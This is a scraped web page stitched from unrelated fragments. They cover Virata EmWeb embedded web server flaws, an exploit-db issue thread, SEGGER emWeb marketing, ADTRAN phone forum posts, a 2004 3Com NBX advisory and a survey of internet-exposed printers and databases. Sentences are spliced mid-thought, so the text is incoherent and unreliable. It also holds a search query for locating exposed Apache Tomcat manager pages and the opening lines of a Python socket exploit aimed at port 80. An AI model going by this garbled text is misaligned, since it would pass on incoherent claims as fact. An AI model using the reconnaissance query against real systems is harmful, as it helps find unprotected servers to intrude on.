JavaScript and XML. Multi Tasking: The web server needs to run as a separate thread. The method token indicates the method to be performed on the requested resource. I'll check that out jwable. Before you open a ticket with Globespan Virata tech support, see if your device or software is in this list. Closed 9 years ago. Linux vm 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 GNU/Linux, ii exploitdb 20180109-0kali1 all Searchable Exploit Database. I should clarify on the phones not working part. Good work John. The target like this which is we entered.. FYI : HTTP server every modem may be is different ok now we must looking our ip browse. Teach me to check that a bit closer . Not finding an existing exploit-db entry (with -t flag): Finding an existing exploit-db entry (w/o -t flag): The text was updated successfully, but these errors were encountered: Should now be fixed. How does profiling conflict work in Clearpass when fingerprint information for an endpoint is received and when no fingerprint information is received for an already profiled endpoint. Severity CVSS Version 3.x CVSS Version 2.0 I would like to close this issue. If you want to subscribe to our monthly newsletter, please submit the form below. Can be accessed and configured using any device with a browser (PC/Mac or mobile devices like smartphones or tablets), Can even be made available over the Internet, Provide easy to use graphical interfaces for control or data acquisition, Compatible with all browsers for PC/Mac and mobile devices, Supports modern standards like WebSockets (additional add-on), REST, SSE and many more, Independent of the TCP/IP stack: Any stack with sockets can be used, Can be used on embedded targets or PC (Windows/Linux/) and Mac, Samples for embedded targets and PC included, showing simple and advanced use cases, Smallest configuration can run in a single task for multiple connections, Wireless headphones (configuration of presets), MP3 player (configuration and playlist management), Fitness tracker (configuration and statistics). Copyright 2023 Hewlett Packard Enterprise Development LPAll Rights Reserved. Remember, a web server without enabling SSL/TLS means sending a visitors sensitive data (like passwords) unencrypted over a public network. Its concept was simple; probe device for default credentials; infect it; repeat. I have indeed checked the MAC address. HTTP is a challenge and response protocol. Despite it showing DHCP for 192.168 and for the 10.10 networks, the computers (192.168) actually get DHCP from a separate router. Explore our interactive Demo or sign up for free 14-day trial. Here go the key findings from our research. Most corporate networks allow an administrator and a few privileged users to connect to internal servers and machines remotely for ease of troubleshooting and flexible work practices. Related Information. Using a more specific search query, we were able to gain access to the unauthenticated interfaces of 205 HP LaserJet printers exposed to the internet (Figure 10). This is done to prevent any false positives (if profiling information for actual endpoint is not received for some reason [like port 161 being blocked unintentionally if subnet scan is used]). The incident was enough to alert various organizations to rethink their system security on the Internet. It resulted in some of the biggest Distributed Denial of Service (DDOS) attacks we have ever witnessed. Profiling conflict will not be triggered for such cases. 101 Suffolk Lane Make sure you include the voice settings when u download it from the GUI. #!/usr/bin/python import socket host = '' port = 80 That does help. Using the IP-over-USB technology, basically all devices that come with an USB connector can feature a browser UI. Without frequent security updates, Windows XP computers have become much more vulnerable to being hacked. Click Login . While this is a clear advantage to the programmer and designer of an UI, there are even more advantages for your customers, making your device more user friendly than ever before: Devices that use browser UIs are becoming more standard. Hence local security checks might not work. The process known as Google Hacking was popularized in 2000 by Johnny China: SEGGER Microcontroller China Co., Ltd. Room 218, Block A, Dahongqiaoguoji We were able to find 572 ES databases exposed to the public in India (Figure 16). Ironically around 500,000 domestic servers still rely on HTTP rather than its advanced counterpart. Milpitas, CA 95035, USAus-west@segger.com Affected Products Virata EmWeb R6.0.1 Impact System Compromise: Remote attackers can crash vulnerable systems. Also, there is\r\nno ability to keep hackers and crackers from connecting to the 'open/bare' nbx call manager web port via ip\r\naccess control lists on the nbx. The phone booted up with the right configuration and registration just fine. If the phone does not get Option 157 then it will just boot up on the IP subnet it gets DHCP for so if it gets it from the other DHCP device instead of the 7100 it wont boot up right. Hours of frustration due to that. Fax: +1-978-874-0599, Silicon Valley While a browser based UI is typically thought of being exclusive to Ethernet or WiFi capable devices, this is not where it has to end! this web . information was linked in a web document that was crawled by a search engine that Long, a professional hacker, who began cataloging these queries in a database known as the Together with browser DOM (Document Object Model) support, it allows dynamic modification of a page without requiring to reload the complete page. Some of these result in direct access to critical infrastructure as in the case of services with authentication disabled. Such insecure interfaces may give information about printer status and internal network configuration to help understand an organizations internal network. Check the phone status by hitting Menu, Phone Status, Network down arrow to the IP address if it is not getting a 10.10.20.X IP address it is most likely VLAN issues. Password audit; Web scanners; Wireless; Exploitation. End users of these products can remotely monitor, configure, and manage devices or applications via the Internet using a standard web browser interface. The chart sample is part of the emWeb shipment. Here's the config (attached). Cisco ASA5520 Web VPN Host Header XSS Description Cross-site scripting. On the NETVANTA side, it says it is not SIP registered but despite everything I have tried to do, I cannot figure out how to get the phone to register with the SIP server. Other soft- and hardware isn't tested yet. Note: Saftchecks mode only does web queries, XSS,\r\netc..\r\n\r\nThe 3com NBX uses VXWORKS Embedded Real time Operating system and what appears to be Virata-EmWeb/R6_0_3\r\nweb server. Not shown:995closed ports PORT STATE SERVICE VERSION 80/tcp open http Virata-EmWeb6.2.1 280/tcp open http Virata-EmWeb6.2.1 443/tcp open ssl/http Virata-EmWeb6.2.1 515/tcp open tcpwrapped 14000/tcp open tcpwrapped Figure 1: Open ports of MIT protected printers. Could you also add this feature for printers that don't have any other name supplied? Virata's EmWeb embedded web management solutions deliver the software technology, development tools and design support necessary to help developers create innovative web-managed products. As the name implies, the Basic Authentication scheme is a very simplistic mechanism for access control, in terms of security. and usually sensitive, information made publicly available on the Internet. lists, as well as other public sources, and present them in a freely-available and I have the phone configured properly, but it does not connect. The POST method submits data to be processed to the identified resource. The HP Embedded Web Server (EWS) is a printer homepage accessed through a web browser for managing settings and performing maintenance tasks. Note: The configuration screen will open. \r\nSelect default scan runs.\r\n\r\nOriginal copy of this report can be found here \r\n<http://www.secnap.net/security/20040420.html> \r\n\r\nCopyright: \r\nAbove Copyright(c) 2004, SECNAP Network Security Corporation. The line we are having issues with is 8765 - Wendy. This allows using the same UI for device families that come in different models and features regarding their host interfaces. MongoDB, known for its data storage flexibility, is now notorious for exposing almost 100 million user data records. Do not use NBX VOIP for remote offices or phones unless\r\nyou have a MultiCast capable VPN or private VPN.\r\n\r\n3com Response: None\r\n\r\nSolution: \r\nPlease contact vendor for new firmware when they fix it.\r\n\r\nFor a report on Security Risk Factors with IP Telephony based Networks \r\nsee: \r\nSecurity_Risk_Factors_with_IP_Telephony_based_Networks Also reference article "is VoIP vulnerable ?"on\r\nNWfusion.com http://www.nwfusion.com/news/2002/0624voip.html \r\n\r\nsee "Firewall limits vex VoIP users" at Nwfusion \r\nhttp://www.nwfusion.com/news/2002/0625bleeding.html \r\n\r\nFor earlier problems with 3com NBX, ftp denial of service attack, see\r\nhttp://www.secnap.com/security/nbx001.html\r\nCredit: \r\nThis problem was originally found during a routine security audit by Michael Scheidell, SECNAP Network\r\nSecurity, www.secnap.com using the Nessus vulnerabilities scanner, www.nessus.org., \r\n\r\nAdditional Information: \r\n\r\nTo test your systems for this vulnerability, you can use Nessus at www.nessus.org. Incidentally, most of these security breaches were the result of some common mistakes like using vulnerable software components, ignoring vendor security updates, maintaining a weak security policy or mis-configuring security products. Over time, the term dork became shorthand for a search query that located sensitive This was meant to draw attention to And that allows adversaries in the network or downstream to snoop on the unencrypted data stream between the client and the server. I am currently trying to figure out how to add an ADTRAN 712 phone to our NETVANTA 7100. Query: country:in and /manager/html/ and apache. The Exploit Database is a repository for exploits and I cant seem to get it to change to the host name. Astoundingly, this number has remained unchanged over the past few months. Click here to learn more. The template page can be a simple HTML page with a placeholder for the counter value. In Sept 2017, two years after Microsoft ditched support for Internet Information Services (IIS) 6.0 and Windows Server 2003, a crypto miner malware was reported in the wild utilizing CVE-2017-7269 to infect IIS 6.0 servers for mining Monero crypto currency. On some of our Asset names for printers, it did not put the host name but instead put the model and ip address together. . by a barrage of media attention and Johnnys talks on the subject such as this early talk The EWS not being available is likely a network misconfiguration or a firmware problem. Even targets that do not feature traditional network access via Ethernet cable or WiFi access can benefit by using a browser UI. [RFC 2616] defines 8 method tokens. In the below log, we have received profiling information for endpoint from NMAP and user-agent. Recommended Actions Currently we are not aware of any vendor supplied patch for this issue. The way I read it this phone never worked. Welcome to the open-sez.me Globespan Virata default passwords page. Figure 1 summarizes publicly exposed networking services (such as SSL, SMB, HTTP etc.) - Exploit - The Virata EmWeb software is embedded in multiple printers and DSL modems. By reading this definition itself one can understand the gravity of the situation here. recorded at DEFCON 13. Earlier this year ElasticSearch (ES) surfaced in the news when its servers were spotted hosting Point-of-Sale (POS) malware in the United States, mostly due to a server misconfiguration issue. Model: Virata-EmWeb/R6_2_1 (should be HP LaserJet xxxx) Another example: Name: Hewlett Packard Model: HTTP/1.0 Most of them have the above 2 model names, or "HP-ChaiSOE/1.0" Thanks. The phone will default and then after the phone is done booting up, post the debug output here. To verify the printer is connected to the network correctly print off a configuration report from the printer. For the defaults to work in your Globespan . A HTTP request starts with a method token. Download emWeb Web server live statistics sample. This website uses cookies. 12-04-2013 07:26 PM SIP configuration for ADTRAN 712 with NETVANTA 7100 Jump to solution I am currently trying to figure out how to add an ADTRAN 712 phone to our NETVANTA 7100.
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